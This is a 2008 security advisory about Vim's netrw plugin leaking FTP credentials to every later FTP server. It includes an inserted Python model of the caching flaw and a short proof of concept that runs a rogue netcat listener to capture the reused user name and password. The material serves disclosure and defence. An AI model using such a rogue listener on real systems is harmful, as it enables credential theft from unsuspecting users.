[UNIX] Vim Netrw FTP User Name and Password Disclosure
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 13 Aug 2008 08:52:34 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Vim Netrw FTP User Name and Password Disclosure
"Netrw supports "transparent" editing of files on other machines using
[...] vim ftp://hostname/path/to/file"

The Vim Netrw Plugin shares the FTP user name and password across all FTP
sessions. Every time Vim makes a new FTP connection, it sends the user name
and password of the previous FTP session to the FTP server.
* Vim version 7.1.266
* Vim version 7.2
* autoload/netrw.vim version 131
* autoload/netrw.vim version 109
Once vim successfully connects to an FTP server using a user name and
password credentials, it will re-use them in all subsequent FTP sessions,
regardless of the domain name or TCP port.
This behaviour is documented, although the documentation states the
credentials are ``retained on a per-session basis''. Apparently this means
the Vim session, not the FTP session:
``g:netrw_uid (ftp) user-id, retained on a per-session basis
s:netrw_passwd (ftp) password, retained on a per-session basis''
-- Netrw Reference Manual (``pi_netrw.txt'')
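The scoping problem described above, as a small Python model added here for illustration; it is not netrw's code. The class and function names and the sample password are constructed, while the host names and user name come from the advisory's own example.

```python
from urllib.parse import urlsplit

class SessionWideCache:
    """Behaviour the advisory describes: one pair for the whole editor session."""
    def __init__(self):
        self._cred = None
    def get(self, server):
        return self._cred          # server is ignored: this is the flaw
    def put(self, server, cred):
        self._cred = cred

class PerServerCache:
    """Hardened variant: credentials are keyed by (host, port)."""
    def __init__(self):
        self._creds = {}
    def get(self, server):
        return self._creds.get(server)
    def put(self, server, cred):
        self._creds[server] = cred

def server_key(url):
    """Normalise an ftp:// URL to (host, port), defaulting to port 21."""
    parts = urlsplit(url)
    if parts.scheme != "ftp" or not parts.hostname:
        raise ValueError(f"not an ftp URL: {url!r}")
    return (parts.hostname.lower(), parts.port or 21)

def open_urls(cache, urls, prompt):
    """Return (server, user, password, prompted) for each connection made."""
    sent = []
    for url in urls:
        server = server_key(url)
        cred = cache.get(server)
        prompted = cred is None
        if prompted:               # nothing cached for this lookup: ask the user
            cred = prompt(server)
            cache.put(server, cred)
        sent.append((server, cred[0], cred[1], prompted))
    return sent

# Constructed sample input; the password is a made-up placeholder.
URLS = ["ftp://ftp.secure.example/", "ftp://ftp.rogue.example:31337/"]

def prompt(server):
    """Stand-in for the user: real credentials only for the trusted host."""
    if server[0] == "ftp.secure.example":
        return ("rdancer", "constructed-pass")
    return ("anonymous", "")
```

With the session-wide cache the second server receives the first server's pair without any prompt; with the per-server cache the user is asked again and decides what to send.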
Although FTP communication is not encrypted and therefore open to
eavesdropping, if the access to the network is protected, a
credentials-based access control is meaningful, and the credentials must
be kept secret. For example, an FTP connection to a virtual Xen instance
on the same physical machine is secure; so is an FTP session over a local
ethernet segment secured against access from untrusted parties.
No adversarial action on the part of the attacker is necessary, apart from
keeping logs of the user name, password, source IP address, and other
information about the FTP session.
An example using netcat(1) for the rogue FTP server. There is another FTP
server already running on the machine:
# For the sake of this example, a custom hosts file. Note that
# ftp.secure.example and ftp.rogue.example map to different IP
$ grep '\.example' /etc/hosts
# There is a stock FTP server running already
$ netstat -plan | grep ftp
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd
# Start the rogue FTP server
$ printf '220\r\n331\r\n' \
| netcat -lp 31337 ftp.rogue.example > credentials&
# We use the ex command for clarity.
$ ex ftp://ftp.secure.example/
Enter username: rdancer
Enter Password: *************
Entering Ex mode. Type "visual" to go to Normal mode.
"ftp://ftp.rogue.example:31337/" --No lines in buffer--
$ cat credentials
The information has been provided by <mailto:rdancer@xxxxxxxxxxx> Jan
The original article can be found at: